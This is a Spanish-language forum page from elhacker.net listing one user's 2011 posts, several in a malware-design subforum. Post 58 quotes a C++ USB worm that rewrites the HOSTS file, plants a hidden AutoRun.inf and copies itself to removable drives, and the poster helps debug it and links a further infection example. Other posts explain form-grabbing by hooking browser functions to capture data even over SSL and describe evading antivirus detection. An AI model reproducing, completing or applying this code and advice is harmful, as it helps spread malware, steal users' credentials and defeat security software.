elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 72
51  Foros Generales / Noticias / Re: Nokia alerta a Android del peligro de un pacto Google-Motorola en: 18 Agosto 2011, 21:17 pm
Si a google lo dirigiera el tipo de gente que dirige a Microsoft o a Nokia seguramente sí, pero estamos hablando de una compañía con gente inteligente a la cabeza  :D.

Saludos
52  Media / Diseño Gráfico / Re: Mi galeria de dibujos en Paint (2) en: 16 Agosto 2011, 15:41 pm
Jajajaja, que bueno xD.
53  Foros Generales / Noticias / Re: Google adquiere Motorola Mobility por 12.500 millones de dólares en: 16 Agosto 2011, 00:21 am
Yo no veo monopolio por ningún lado, es un movimiento de reacción ante los ataques constantes de Apple, y ya que microsoft se puede cubrir las espaldas con Nokia, ahora google también tendrá con que defenderse.

Saludos
54  Seguridad Informática / Análisis y Diseño de Malware / Re: Como funciona el formgrabber de un malware? en: 14 Agosto 2011, 21:42 pm
Si, hookear es lo ideal. Incluso (YST lo hizo) hookeando algunas funciones no propias de windows (como HttpSendRequestA), sinó internas del navegador, se pueden obtener los datos incluso cuando se usa SSL. Y bueno, es cuestión de imaginación, hookando algunas API's que se encarguen de la gestión de memoria seguro que puedes capturar algo también. Lo malo de esto es que tienes que buscar la función adecuada para cada navegador, no es algo genérico.

Saludos
55  Seguridad Informática / Análisis y Diseño de Malware / Re: Una shell parecida a Shell Dark2.0 en: 11 Agosto 2011, 22:51 pm
¿Algún detalle de su funcionamiento o alguna página con más información?

Saludos
56  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Cambio en foro "Linux" en: 11 Agosto 2011, 22:24 pm
Yo estoy con vertex, BSD y MacOS no deben estar juntos y ser subforo de GNU/Linux. Sería como si en un foro "no-hacking" ponen "GNU/Linux" de subforo de Windows. Yo optaría por poner GNU/Linux a la altura del subforo de windows y hacer otro subforo "Otros", ya sea este subforo de GNU/Linux o a la misma altura que Windows (de esta última forma se podría nombrar a MacOS y BSD en la descripción del subforo).

Saludos
57  Seguridad Informática / Análisis y Diseño de Malware / Re: Una shell parecida a Shell Dark2.0 en: 11 Agosto 2011, 22:04 pm
¿Qué es eso?

Saludos
58  Seguridad Informática / Análisis y Diseño de Malware / Re: ayuda proyecto worm en: 21 Julio 2011, 13:13 pm
Mirando por encima...Porque para definir las rutas de los arcvihos utilizas \\ ????? mira esto es lo que pones:

Código:
strcat(hst, "\\Drivers\\ETC\\HOSTS");
..
strcat(dirX, "\\");
..
CreAut<<"shell\\Auto\\command=gusano.exe"<<endl;

Si defines las rutas con esos palítos ni se copiará ni funcionará nunca en windows las rutas se defínen de la siguiente forma por ejemplo:

c:/window/system32

En C, '\' es el caracter de escape, por lo que si quieres poner '\' en una cadena has de poner '\\'.

hola a todos estoy de vuelta mi pregunta es que estoy haciendo mal por que no me esta infectando el usb este es mi codigo espero me puedan giar
Código:
#include <cstdlib>
#include <iostream>
#include <windows.h>
#include<fstream>
#define PROCESSNAME "gusano.exe" //nombre del proceso

using namespace std;
 
    char me[1024];
    HKEY hKey;
    char *drives[] = {"C:","D:","E:","F:","G:","H:","I:","J:","K:","L:",
                      "M:","N:","O:","P:","Q:","R:","S:","T:","U:","V:",
                      "W:","X:","Y:","Z:"};
                      void hst(void)
{
char hst[MAX_PATH];
    DWORD byte;
HANDLE hFile;
BOOL bSuccess;
GetSystemDirectory(hst, sizeof(hst));

strcat(hst, "\\Drivers\\ETC\\HOSTS");
const char* buffer = "127.0.0.1 www.entel.bo";
hFile = CreateFile(hst, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
bSuccess = WriteFile ( hFile, buffer, strlen(buffer), &byte, NULL);
CloseHandle(hFile);     
}

    //busqueda e infeccion del usb
    int FindDrv()
{
         char *drives;
char dirX[MAX_PATH];
char path[MAX_PATH];
char autorun[MAX_PATH]="AutoRun.inf";
ofstream CreAut;
HMODULE GetQ;

   GetQ=GetModuleHandle(NULL);
    GetModuleFileName(GetQ,path,sizeof(path));
      CreAut.open(dirX,ios_base::out);
             CreAut<<"[AutoRun]"<<endl;
             CreAut<<"open=gusano.exe"<<endl;
             CreAut<<"shellexecute=gusano.exe"<<endl;
             CreAut<<"shell\\Auto\\command=gusano.exe"<<endl;
             CreAut<<"shell=Auto"<<endl;
      CreAut.close();
      SetFileAttributes(dirX,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);
             UINT type= GetDriveType(drives);
                  if(type == DRIVE_REMOVABLE)
                     {
                       strcpy(dirX, drives);
                       strcat(dirX, "\\");
                       strcat(dirX, "gusano.exe");
                       CopyFile(path,dirX,TRUE);
                     
                       return 0;
                     }
  return 0;
}

int main(int argc, char *argv[])
{
    hst();
    FindDrv();

system("PAUSE");
  // ShellExecute(NULL,"open", PROCESSNAME, NULL, NULL, 0);

    return EXIT_SUCCESS;
}

Fíjate que estás declarando dos veces la variable drives, una vez como variable global y luego en la función que infecta el USB, y en esta la declaras como un puntero que apunta a saber a donde, seguramente por eso no funciona. Te dejo un ejemplo que hice hace mucho tiempo por si te sirve:
Código:
http://foro.elhacker.net/analisis_y_diseno_de_malware/srcc_infeccion_usb-t258426.0.html

Y bueno, ten en cuenta que este método no funcionará en Windows 7.

Saludos
59  Seguridad Informática / Análisis y Diseño de Malware / Re: Indetectando AVIRA en: 16 Julio 2011, 15:50 pm
Exacto, esas modificaciones que algunos hacéis con el editor hexadecimal es una tremenda gilipollez. Al cambiar los opcodes cambiais las instrucciones, que si los cambiais por valores cercanos (sumandole uno o restandole uno) puede funcionar (alomejor el 1% de las veces xD) de tremenda casualidad. La forma correcta de hacerlo es aprendiendo ASM y sustituyendo ese trozo de código por uno equivalente y diferente, usando Olly.

Saludos
60  Seguridad Informática / Análisis y Diseño de Malware / Re: [MASM][UserMode]Hook OpenProcess en: 16 Julio 2011, 00:34 am
The_wash esta re-inventando la rueda, hace rato que viene rehaciendo los tutoriales y codigos que ya estan hechos.  :silbar:

Es la única forma de aprender, no me gusta nada la gente que piensa de esa forma. Yo recibí ese tipo de críticas en algunos foros y me ponen enfermo, si no experimentas las cosas no aprendes, es el proceso lo más importante, no el resultado.

Saludos
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 72
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines